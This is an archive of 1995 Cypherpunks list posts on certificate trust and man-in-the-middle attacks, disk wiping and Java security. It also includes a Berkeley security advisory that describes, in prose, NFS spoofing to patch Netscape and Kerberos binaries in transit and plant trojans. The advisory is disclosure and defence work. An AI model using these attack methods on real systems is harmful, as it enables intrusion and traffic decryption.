Subject: Re: Certificate proposal
In-Reply-To: <199510091903.MAA22499@jobe.shell.portal.com>
Message-ID: <199510091926.MAA08047@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	In the situation you cite, Bob doesn't know Alice apart from
their email correspondence?

	In this case the ISP is acting as extension-of-alice. Bob
thinks he is talking to Alice but he is talking to ISP+Alice. What
difference does it make, if Bob has no knowledge of Alice outside
their email discussion, that Bob is talking to ISP+ Alice rather than
just alice. From Bob's perspective, Alice is really an alias for
ISP+Alice. (The same goes for Alice in the other direction.)

	In tim's words, from alice's point of view "Bob the key" ==
"BOB the person and Bob's ISP". From Bob's point of view "Alice the
key" == "Alice the person & Bob's ISP".

	The MITM attack only matters if there is a context outside the
email correpondence. (Say, perhaps, a drug deal which involves real
physical goods.) 

	More concretely, All I know of 'Hal' is through is emails. If
his ISP is intercepting the email between him and me, then my
definition of 'Hal' is 'Hal+ISP' -- it doesn't make a real difference
unless there is another context involved.

	(The MITM is still -important- though, because in most
situations there *is* some external context)



> 
> tcmay@got.net (Timothy C. May) writes:
> >For communication, the only credential Alice needs to ensure that only Bob
> >can read her message is that she uses Bob's public key. If "Bob the Key"
> >reads it, presumably it was "Bob the Person" who read it.
> 
> >(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
> >let his private key out, so that Chuck the Person is also able to read the
> >Bob the Key stuff, etc., then of course cryptography cannot really handle
> >this situtation.)
> 
> OK, but again, what about the man in the middle attack?  Suppose the
> key that you found that claims to be from Bob is actually not his, but
> another one created by a man in the middle, such as Bob's malicious
> ISP?  Then that ISP is decrypting the messages Alice sends to him using
> that fake key, and re-encrypting them using Bob's real key.  He is
> reading all of the messages, and Alice and Bob do not in fact have
> communications privacy.
> 
> I don't want to overstate the risk of this attack.  It would not be an
> easy one to mount and I believe there are countermeasures which could
> detect it unless the MITM had nearly supernatural powers.  But the MITM
> attack is normally considered seriously in discussing crypto protocols.
> It is a well known weakness in Diffie-Hellman, for example.  That is why
> authenticated Diffie Hellman is used in some of the newly proposed key
> exchange protocols for IP.  The risks of MITM attacks on public key
> systems was recognized not long after those systems were proposed.  The
> problems with fake keys have been discussed for over a decade.
> 
> Why is this all suddenly irrelevant?  Were these attacks never realistic?
> Is it just not a problem somehow?  I am baffled by the fact that people
> are just turning their backs on all these years of research and
> experience.  If this is some kind of paradigm shift in which the idea of
> communicating with keys is seen as the key to the puzzle, then I am
> afraid I don't share the enlightenment.  To me the problem seems as real
> as ever.
> 
> Hal
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Mon, 9 Oct 95 04:37:11 PDT
To: rjc@clark.net>
Subject: Re: (cpx) Netscape 2.0 beta
In-Reply-To: <v02120d12ac9db2d1ea18@[199.0.65.105]>
Message-ID: <9510091129.AA01630@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>  The good news is that someone finally, after years, has implemented
>Progressive JPEG (I've been yelling about it for a while myself), and
>it is simply *light years* better than interlaced GIFs.

How do I create Progressive JPEG pictures?

Note to Cypherpunks: Please answer via email, I receive only selected  
material from your list!

Thank you very much in adance,
  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(MIME and NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
GCM/B d-- s: a- C++ US+++$ UX+++ P+ L E? W++ N++ w-- O-(++) M+ !V PS++ PE Y+  
PGP(++) t+ 5? X? R+ tv b++ DI D++ G e+++>++++ h+ r++>% y? (Geek Code V3.x)
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 12:21:57 PDT
To: cypherpunks@toad.com
Subject: Re: PC wipe utilities
Message-ID: <ac9ec30f04021004c1ed@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 10/9/95, Brian D Williams wrote:

>Alan Penny's  excellent freeware utility wipe.zip has been
>uuencoded and sent to you. I believe it fulfills your requirements.
>
> As recently as the last issue of WIRED an article by a data
>recovery company claimed they could recover data that had been
>overwritten nine times...... make it a bakers dozen to be safe.

Better yet, wipe the disk/diskette on _more than one_ machine. It should be
easy to just run the wipe on, say, 3 machines, 3 to 5 times each.

A lot of the ability to recover putatively erased media lies in the fact
that a given set of read-write heads has characteristics (especially with
regard to positioning) that make repeated erase passes less than fully
effective. The remnants of the recorded signal can be extracted with
careful analysis of the analog signal (especially from special read heads).

Using N erase machines increases the "jitter" to some extent.

My hunch is that it would make the recovery process exponentially (in N)
more difficult. But I have no lab experience in this, so this is just an
idea.

But crunching the media is a faster (and maybe cheaper) approach.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 9 Oct 95 09:53:48 PDT
To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
In-Reply-To: <199510061922.MAA06669@comsec.com>
Message-ID: <9510091651.AA26787@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 5 Oct 1995 21:40:04 -0700
>From: Hal <hfinney@shell.portal.com>

>I don't really care whether the name is called an attribute, a
>distinguished name, or an ooblek.  I just don't see how you're going to
>get along without it.  The fact is, we live in a world populated by
>people and companies and we use names to identify them.  I will grant
>that there are problems with uniqueness but I don't think the solution
>can be to just give up on the whole idea of names since they are so
>messy.  

We're not talking about giving up on names.

You have lots of names for things -- some of them are even nicknames, known
only to you.

For any certification scheme, you also need a unique name.

If you happen to use the public key as that unique name, you have the
proposal we're talking about.  It has an advantage -- that you don't
have to certifiy the binding between the unique name and the key.
That's built in.

 -Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHlSzVQXJENzYr45AQFYvgP+O12CvK058nWvhvq48QIqIBo8N5jU6uqN
8kFagz2iKPLcv+cLJ7AiFiOAU3mY5CiWkU0pK6z9YlNgB7d5SNqyzpAL8jIe6zgI
xD5hAesL6Pz85f8OLAn9teoydW9k3QzBekOeT0xCKkIj8+8KUDM7nrUMl2t08bTr
OG53eFdFD6o=
=d7lq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 10:03:30 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510091701.NAA18171@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510090412.AA02181@pulm1.accessone.com>, blancw@accessone.com wrote:

> Another thought is that as people become more separated into individual 
> self-reliance, they must develop other ideas, organizations, or means by
which 
> they may defend themselves from abuse.  That is, if they cannot rely on 
> governments (as they come to realize that governments don't make much 
> difference in terms of salvation), then individuals must become more 
> imaginative over how they can defend themselves against those who are not so 
> conscientious in upholding a sense of personal honor & moral rectitude.

Correct, Blanc. That's why I am saving my pennies to buy an AR-15. I know
the government of the near future will not be in a position to stand in
the way of my involuntary participation in organ transplant experiments.
It will be up to the individual and voluntary neighborhood associations,
etc. to provide our personal security.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHlVXCoZzwIn1bdtAQFkawF8DBRY8Nxeqkld5Ltw1J6VTqm+5JtN2sNZ
PPCOCt7Gl1NKQmkJPlWBC5TY4cgtMrc0
=0pt6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 13:40:11 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510091926.MAA08047@infinity.c2.org>
Message-ID: <199510092038.NAA09612@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>	In the situation you cite, Bob doesn't know Alice apart from
>their email correspondence?

Right.  My goal is to have a system in which two individuals who have
never met can communicate securely.  This is not too radical a notion, I
trust.  In fact, I would go so far as to say that to a considerable
extent it is the whole point of public key cryptography.

>	In this case the ISP is acting as extension-of-alice. Bob
>thinks he is talking to Alice but he is talking to ISP+Alice. What
>difference does it make, if Bob has no knowledge of Alice outside
>their email discussion, that Bob is talking to ISP+ Alice rather than
>just alice. From Bob's perspective, Alice is really an alias for
>ISP+Alice. (The same goes for Alice in the other direction.)

What difference does it make?  I'll tell you.  It means that their
conversation is not private!  It means that their cryptography is
useless, that it has failed.  It means they have an unsecure channel.  I
don't know how I can put it more plainly than this.  I wrote a long
article a few days ago arguing that they almost might as well not use
cryptography if they're going to adopt this stance.  Let anyone
eavesdrop, and from Bob's point of view when he thinks he is talking to
Alice he is actually talking to eavesdroppers+Alice.  From his point of
view, Alice is just an alias for eavesdroppers+Alice.  Etc., etc.

>	In tim's words, from alice's point of view "Bob the key" ==
>"BOB the person and Bob's ISP". From Bob's point of view "Alice the
>key" == "Alice the person & Bob's ISP".

This is not a useful or appropriate way to think of the world, IMO.  If
you do this, then from your perspective people become bafflingly
unreliable.  I wrote all about this before.

>	The MITM attack only matters if there is a context outside the
>email correpondence. (Say, perhaps, a drug deal which involves real
>physical goods.) 

Try to think of it not in relativistic or epistemological terms, but
rather look at it in terms of reality.  The real world exists, and in it
exist real people.  We can agree on this much, right?  Two of these
people want to communicate securely.  That is not such a stretch of the
imagination, is it?  By "communicate securely" I mean they exchange
information in such a way that other people don't receive it.

Now surely it is clear that with this definition of the problem,
approaches which redefine people to mean people+eavesdroppers are not
responsive.  Perhaps the motivation to do so is simply the belief that
the problem is not solvable as stated.  If so, I'd like to hear someone
say this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 13:55:12 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510092054.NAA12060@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:

>You have several alternative means of verifying the key:

>1) You can meet Bob at a local Pizza Hut and verify the key in person.

>2) You can go through a variety of channels to a variety of other
>trusted entities and verify with them that they're using the same key
>for Bob.

>3) You can set up some sorts of communications tests to "probe" for a
>MITM situation, perhaps by passing through "seeded" information (data
>taggants?).

I will agree that there are alternatives to certificates.  I alluded to
this in the part of my message which you elided below, about defeating
MITM attacks via various techniques.  However, it may not be as easy to
automate these tests as to automate a certificate check, and in
particular the more automated the tests become the more plausible it
would be that the MITM could recognize and defeat a standard test.

> > I don't want to overstate the risk of this attack.  It would not be an
> > easy one to mount ... The risks of MITM attacks on public key
> > systems was recognized not long after those systems were proposed.  The
> > problems with fake keys have been discussed for over a decade.
> >
> > Why is this all suddenly irrelevant?  

>I don't think it is irrelevant, I just think it's orthogonal to the
>issue of whether a certificate for a key<-->entity relationship is
>considered to be the key or an adjunct to the key.  I could be wrong,
>of course.

The POV I am really arguing against is the one that defines identity to
be a key, that states that in communicating with a key you are by
definition communicating with the person you have in mind.  The man in
the middle attack does not exist because from your point of view the
entity at the other end of the communication channel is just the MITM
plus the person you think you are talking to.  This idea has been
expressed many times by other people in this discussion, and it is this
which I think is fundamentally flawed and even dangerous because it
encourages the use of untested keys.  In fact it seems to define away
the question of whether a key is real or fake.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Mon, 9 Oct 95 10:59:21 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951009135607.26382B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> I thought I'd ask here, since its related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?
> 
> Perry

Norton Utilities has been able to do this for a long time.  I think
the program is called <wipedisk> (wipe "unused" area of a disk), and I
believe there's also a <wipefile> that will obliterate a file.  These
things are supposed to conform to some unspecified "government
guidelines," so you decide how good they are.  My guess is that
they're plenty good enough.

   --D.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 14:13:21 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091958.AA23589@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951009141337.13562D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Rich Salz wrote:

> >As far as I know Java apps can only make network connections to the
> >IP address they were loaded from.
> 
> What part of the state of my machine can they access and send out
> to the "home port"?  Can they read /etc/passwd, make NIS requests,
> etc?

Java applets can't read /etc/passwd, and can't issue NIS requests unless 
they were downloaded from an HTTP server running on the NIS server 
(actually, they can't do UDP at the moment, so that's out as well)

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 9 Oct 95 14:56:43 PDT
To: cypherpunks@toad.com
Subject: java security & the cypherpunk agenda
Message-ID: <199510092126.OAA11086@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



once again I will offer a contrary view, and once again to PM. 
PM predicts that serious (unfixable?) bugs will be found in Java on 
the level of what was recently identified in Netscape. I disagree.

I am not intimately familiar with Java (nor, obviously, is PM), but I 
know Java was designed from the ground up to be secure on every platform
it is running on. in contrast to most OSes, the whole theory of Java
is based on creating a totally secure, unbreakable programming 
environment. most OSes start out with the idea, "what is an application?
how does the OS handle it? how does the OS permit file I/O etc.?"
Java starts out with the idea, "what operations can be allowed without
compromising security but still allowing algorithms"?

the software will succeed or fail in its aims on how
well it accomplishes the criteria of unbreakable security.. 
I suspect it is eventually going to be considered more secure than 
many OS's out there that it runs on (even unix). (and Java may eventually
evolve to become an integral part of future OS security apparatuses).

one thing that people don't seem to realize: Java was clearly engineered
to be a language that would allow "cycle sales" over cyberspace. in 
other words, how can companies lease out unused cycles to the world
just like power companies sell off their extra watt-hours to adjacent
cities? a secure language is the critical piece, and the Java designers
were clearly aiming for this remarkable and commendable accomplishment.
someday, even conservative companies such as IBM may agree that the 
security of Java is so great (and so widely well-proven as rock solid)
that they will lease out their unused, nighttime CPU cycles to 
Java applications and interested buyers, because they can be sure
that there is just no way to sabotage a system no matter how ingenious
you are..

PM tends to suggest that any language or computing environment
with a certain degree of complexity simply cannot be made secure.
I generally agree with this. however I suspect that Java is beneath
this complexity cutoff.

I do agree with other cypherpunks however that focusing cpunk attentions
on breaking Java is a highly worthwile activity. Java is an extremely
promising development and I fully suspect it will become something
of the first widespread "cyberspatial programming language". in
another message I talked about how companies such as Netscape may
not become so security conscious themselves but work with other
companies who are security paranoid and try to successfully integrate
their applications. Java is the prime candidate for this. and I am 
willing to bet the Java engineers have seen every security trick in the 
book (many I suspect perhaps even PM in his own paranoia and obsession is not
aware of) and can demonstrate how Java, at least if implemented bug-free,
defeats *all* of them and can virtually be proven secure.

now, that little catchword "bug-free" I put in the last sentence is
something that everyone here can jump on. "it might be possible to 
create a secure language *in*theory*" say the naysayers, "but in 
practice it will always have bugs that can break it." well, I think
if anything will go beyond this weakness, Java has the best chance.
and the above argument sounds suspiciously like, "no software can really
accomplish exactly what it sets out to, because it will have bugs".
sure, Word and Excel both have bugs, but they do not defeat the primary
design. and this argument, "you cannot implement perfect software" is
more of a complaint against human psychology than against a group who
is trying to implement a theoretically secure programming environment.
(perhaps they should use the qualification, "java is the first secure
programming language, in theory; in practice YMMV <g>").

I think we should be careful to make this distinction. there is
a lot of software that is not even theoretically secure, and there
is some software that tries to be secure but is not due to implementation
difficulties. the latter should not really be our concern so much.
we are not here to try to prevent programming errors (i.e., not 
correctly translating a correct design into code) so much as to 
try to get companies to write software, that if written properly,
is secure. (it seems to me this is the logical first step, and then
then next step is trying to break the code that seeks to be secure
and flame the eyebrows off its designers, as has been done here
recently <g>, but unless one first has a good hammer, one does not
care about faulty nails..)

I was talking to a press reporter and he asked if the cpunks had gone
into some sort of new phase in which they were becoming something
like the policemen of cyberspace. I said that they had not really changed
in their goals much at all, it's more that the software that cpunks
have fantasized about for years is now starting to materialize, and there
is now something concrete to focus energies on. Netscape is a good 
example, and Java is another example. I think if I had talked about
Java a few years ago on this list, and about who invented it (Sun),
what it was designed to do, etc., people here would be delirious with
excitement. instead, there is a bit of cynicism here that is a bit
surprising to me. if there ever was a "cpunk language" that seeks to achieve
widespread, home-grown, secure algorithms in cyberspace, I would consider 
this this closest.

I highly recommend cpunks pay close attention to Java and help in its 
development, because imho it really has been conceived largely with key
cpunk agenda items as basic design criteria.
I suspect it is going to become a very strong standard and eventually
recognized as one of the most secure pieces of software ever designed, 
at least in regards to theoretical capabilities.

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
Date: Mon, 9 Oct 95 14:29:31 PDT
To: bugtraq@crimelab.com
Subject: Basic Flaws in Internet Security and Commerce
Message-ID: <9510092126.AA22117@espresso.CS.Berkeley.EDU.mammoth>
MIME-Version: 1.0
Content-Type: text/plain



Basic Flaws in Internet Security and Commerce

We believe that the current focus on secure session-layer protocols and
sufficient randomness have obscured more fundamental flaws in end-to-end
security. In particular, secure end-to-end transactions require two parts: a
secure protocol to communicate over untrusted channels, and trusted code at
both endpoints. The latter problem has received less attention, but destroys
security regardless of the quality of the protocols or of the random numbers.

We have implemented a series of related attacks utilizing IP spoofing:

   *  We can spoof NFS to patch binaries on the fly if we are on any subnet
     between the NFS client and NFS server. We used this to turn legitimate
     Netscape browsers into versions that used a fixed key (known only to us),
     thus invisibly eliminating security.
   *  The same trick allows us to defeat Kerberos security by attacking kinit.
   *  We can also spoof NFS file-handle lookups, so that we can replace any
     file (such as .login) with another file that runs with root access
     privileges (even if the requesting user cannot).

These work because the trusted path to executables is really not trustworthy in
most environments. Although we use on-the-wire patching to compromise
executables, the client binaries can also be compromised during download, by
on-the-wire patching of FTP or HTTP transfers. Trojan horses and viruses could
also patch the client software after it's on the local disk, especially on
systems like Windows 95 that do not provide access control for files.

Given that these are realistic threats, we believe that these issues must be
resolved before internet security and commerce are realistic.

-------------------------------------------------------------------------------

We began to consider in more detail some fundamental weaknesses of common
network security practices that would lead to trivial further attacks on
Netscape as well as many other security tools like Kerberos. It was our goal to
demonstrate that it is trivially possible to patch executables on-the-wire to
completely compromise their security.

In doing so, we hope to reinforce the point that security is an end-to-end
problem that is far harder than getting the protocols correct. Strong, correct
protocols only make more subtle endpoint attacks more likely, especially in
light of the potential for financial gain as the amount of commerce on the
Internet increases. Most of the attacks we discuss are suitable for the
systematic exploitation of large groups of users: an entire organization, or
even a large fraction of the user base of a particular piece of software.

In many computing environments a pool of common executables, like the Netscape
binary, are provided to clients by a fileserver. In such systems, including
NFS, AFS and Windows NT, there is no authentication of the file contents sent
between clients and servers.

In these systems there are provisions for sophisticated access checks to
determine file permissions, at open or handle lookup time. But the file
contents that are read from the server are not authenticated in any secure way.
The client has no way to determine if the bytes are indeed being sent by the
server.

Our first attack model is one in which the attacker has (promiscuous) network
access to any machine on any ethernet subnet between the fileserver and the
clients under attack. In under a day we produced software that can exploit the
lack of authentication in NFS to patch the object code of any executable
on-the-wire as it travels between the NFS server and the client machine.

The technical details of the attack are rather simple. To retrieve data from
the NFS server a client sends a short request message detailing which block
from the file it is interested in (where a block is a range of bytes). The
attack software is located on an ethernet segment between the client and the
NFS server, so is able to snoop this traffic.

The attack software snoops, waiting for any request for a particular block of a
particular executable; for example, the block containing the session-key
generation code in the Netscape executable. It is then able to forge a reply
from the NFS server and transmit it to the client. If the forged packet reaches
the client before the legitimate reply, it is accepted and the legitimate reply
is discarded as a duplicate.

There is obviously a race condition between the injection of the forged
response and the true response. Since the attacking software is focused solely
on this task, while the fileserver is certainly servicing requests from many
clients, it stands a very good chance of winning the race. We have observed
that the attacking software wins the race a large fraction of the time.

Given this ability it becomes possible to compromise the security features of
any executable loaded from the network. We have examined the Netscape v1.1N
executable and located the code that selects the session key. By patching only
4 bytes we were able to cause the selection of a predictable session key every
time the browser engages in the SSL protocol. It is then trivial to snoop and
decrypt all traffic from the browser to secure servers, obtaining credit card
numbers or other private information.

Since this is really an attack on the client, it is not limited to the Netscape
browser. On the contrary, it is extremely widely applicable. An appropriate
patch to the Kerberos kinit executable makes possible the compromise of any
passwords entered by users, and therefore all of the authentication facilities
provided by Kerberos.

In many environments, including our own here at UC Berkeley, all the Kerberos
application binaries are served from an NFS server. This represents a major
flaw in security as our attack demonstrates. Having authenticated file services
(kerberized NFS or AFS) is useless if the integrity of the kinit executable
cannot be ensured (most easily by obtaining it from local disk).

However, making local copies of crucial binaries is not sufficient in the face
of a more serious set of variants on the NFS spoofing attack. The spoofing
software can be placed as before, in a position to snoop requests to the NFS
server. As clients issue a lookup filehandle request the spoofing software can
return the handle to a different executable and also forge its attributes. By
tricking users into executing code that is setuid root, unlimited access to the
client's workstation can be obtained easily.

It is possible to mount NFS partitions so that setuid root executables will not
be honored by the client. Still, the spoofing software can make arbitrary NFS
filehandle lookup requests succeed, and substitute a trojan of some sort. The
attacker could cause misspellings of commonly executed commands to appear to
succeed, or could spoof other files that are trusted by the operating system.
For example, the user's .login file is a natural and easy target from which to
leverage further damage.

This implies that it is unsafe to execute any program obtained via an insecure
channel to an NFS server, no matter what the privilege level of the client
user.

Neither is it limited to NFS or file-serving protocols in particular. Protocols
based on TCP, rather than UDP, are just as vulnerable. It is possible to hijack
non-authenticated TCP connections, although it is somewhat more complicated.

Attacks based on spoofing traffic coming from the distribution site of popular
software packages is also possible. Berkeley, for example, is a mirror site for
the Netscape browser. Any student with promiscuous network access on a machine
between the ftp server and the main link to the larger Internet could have
installed similar patching software to patch the huge number of copies of the
binary that were retrieved from server.berkeley.edu.

More mundane attacks based on trojan horses or viruses remain viable today.
These attacks must exploit some other weakness in a system's security to
infiltrate, but once in place they can perform patches to local binaries to
fully compromise a system. Previously such attacks were mostly motived only by
ego or malice; it is now more valuable to compromise a client invisibly, so
that the user believes the system is secure. Thus, unlike traditional viruses,
the new strains will aim to have no visible effect on the system, thus making
them difficult to detect and easy to spread unintentionally. Our patch of
Netscape has this flavor.

We realize that it is impossible to eliminate all security holes; one can
always question whether it is safe to trust the hardware, or whether outside
channels used for communication of public keys or checksums are truly secure,
etc. Fortunately, in practice it should suffice to handle far less than all of
these risks. We hope to have demonstrated one gaping hole in practical security
today, and to have highlighted the problem of the trusted endpoint.

There is one simple step that we can suggest that would go a long way towards
improving the security of endpoints. Increasing the practice of software
providers widely publishing cryptographically secure checksums of their
executables would be extremely helpful. A small amount of paranoia and care
must be applied to securing the executables used in the verification process. A
read-only floppy disk would be appropriate to hold the verification software,
for example.

We are concerned that security on users' workstations and PCs is currently
insufficient. When real money is at stake, endpoint security must withstand
greater scrutiny. In summary, protecting the communications channel doesn't
help if the endpoints can be subverted. We implemented and discussed several
related attacks that replace legitimate programs by compromised versions. Until
we can trust every program that executes between the time we boot and the time
we finish the secure protocol, we cannot reliably authenticate anything. Today
there is no basis for this trust.

Eric Brewer, brewer@cs.berkeley.edu
Paul Gauthier, gauthier@cs.berkeley.edu
Ian Goldberg, iang@cs.berkeley.edu
David Wagner, daw@cs.berkeley.edu

A copy of this post is available as
http://http.cs.berkeley.edu/~gauthier/endpoint-security.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 14:40:16 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510092054.NAA12060@jobe.shell.portal.com>
Message-ID: <199510092134.OAA18662@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The POV I am really arguing against is the one that defines identity to
> be a key, that states that in communicating with a key you are by
> definition communicating with the person you have in mind.  The man in
> the middle attack does not exist because from your point of view the
> entity at the other end of the communication channel is just the MITM
> plus the person you think you are talking to.  This idea has been
> expressed many times by other people in this discussion, and it is this
> which I think is fundamentally flawed and even dangerous because it
> encourages the use of untested keys.  In fact it seems to define away
> the question of whether a key is real or fake.
> 
> Hal
> 


Suppose you have Alice, Bob, and Mallet. (Mallet is the convention for
the MITM, right?)

	Suppose Alice and Bob are communicating privately. Suppose
that Mallet is one of Bob's personalities, because he suffers from
multiple personality disorder.

	How is this different from where Mallet is actually Bob's ISP?

	Even if Alice & Bob were talking in person, privately, Alice
doesn't know that she is also talking to Mallet. My point is that
given no other context, there is *no way* to know for certain that you
are communication with the person you have in mind.

	Or suppose that Bob is a drug user doing a plea bargain. He
agrees to have his communications monitored via MITM attack to get a
lesser sentence. He buys drugs from Alice and Alice gets caught.

	The thing I am emphasizing here is the necessity to have some
sort of -context- when addressing MITM. In a situation without
context, MITM is not an issue. In a situation -with- context, MITM is
an issue.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 12:35:35 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <9510091934.AA27962@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > OK, but again, what about the man in the middle attack?  Suppose the
 > key that you found that claims to be from Bob is actually not his, but
 > another one created by a man in the middle, such as Bob's malicious
 > ISP?

You have several alternative means of verifying the key:

1) You can meet Bob at a local Pizza Hut and verify the key in person.

2) You can go through a variety of channels to a variety of other
trusted entities and verify with them that they're using the same key
for Bob.

3) You can set up some sorts of communications tests to "probe" for a
MITM situation, perhaps by passing through "seeded" information (data
taggants?).

 > I don't want to overstate the risk of this attack.  It would not be an
 > easy one to mount ... The risks of MITM attacks on public key
 > systems was recognized not long after those systems were proposed.  The
 > problems with fake keys have been discussed for over a decade.
 >
 > Why is this all suddenly irrelevant?  

I don't think it is irrelevant, I just think it's orthogonal to the
issue of whether a certificate for a key<-->entity relationship is
considered to be the key or an adjunct to the key.  I could be wrong,
of course.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Green <alang@rrs.co.za>
Date: Mon, 9 Oct 95 05:36:49 PDT
To: "'cypherpunks@toad.com>
Subject: PC Tools'  PC Secure
Message-ID: <01BA9654.6D1AC480@alang.rrs.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a utility which can decode files encoded with
PC Tools' PC Secure package (version 5, if my memory serves me
correctly). The package came out some 6 years ago.

Thanks
Alan
alang@rrs.co.za





